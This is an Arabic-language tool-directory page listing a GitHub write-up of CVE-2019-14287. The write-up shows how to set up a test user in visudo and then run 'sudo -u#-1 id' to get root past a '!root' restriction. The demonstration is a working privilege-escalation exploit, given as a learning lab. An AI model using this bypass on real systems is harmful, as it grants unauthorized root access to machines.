Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-14287-write-up — إثبات خطوة بخطوة لثغرة CVE-2019-14287 في sudo والتي تسمح للمستخدمين المقيدين بتنفيذ الأوامر كجذر عبر معرّفات مستخدمين مصمّمة خصيصًا. | Kitploit
أدوات/GitHubGitHub/gurneesh/cve-2019-14287-write-up
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليم
GitHubgurneesh/cve-2019-14287-write-up

CVE-2019-14287-write-up

إثبات خطوة بخطوة لثغرة CVE-2019-14287 في sudo والتي تسمح للمستخدمين المقيدين بتنفيذ الأوامر كجذر عبر معرّفات مستخدمين مصمّمة خصيصًا.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
1منذ 6 سنواتلم تتم المراجعة بعد

CVE-2019-14287-write-up

4294967295 ثغرة Sudo تسمح للمستخدمين المقيّدين بتشغيل أوامر بصلاحيات المستخدم root

توضيح الثغرة

إضافة مستخدم جديد:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // إضافة كلمة مرور للمستخدم visudo

إضافة إدخال جديد

test ALL=(ALL, !root) /usr/bin/id // تحديد أن هذا المستخدم لا يمكنه استخدام أمر id مع المستخدم root

احفظ الملف واخرج من المستخدم root

تسجيل الدخول إلى المستخدم test

sudo su - test

تنفيذ الأمر

sudo id ستظهر لك الرسالة التالية: Sorry, user test is not allowed to execute '/usr/bin/id' as root

الآن نفّذ الأمر

sudo -u#-1 id أو sudo -u#4294967295 id

وهكذا، تكون قد نفّذت أمر id باستخدام المستخدم root

تنزيل الأداة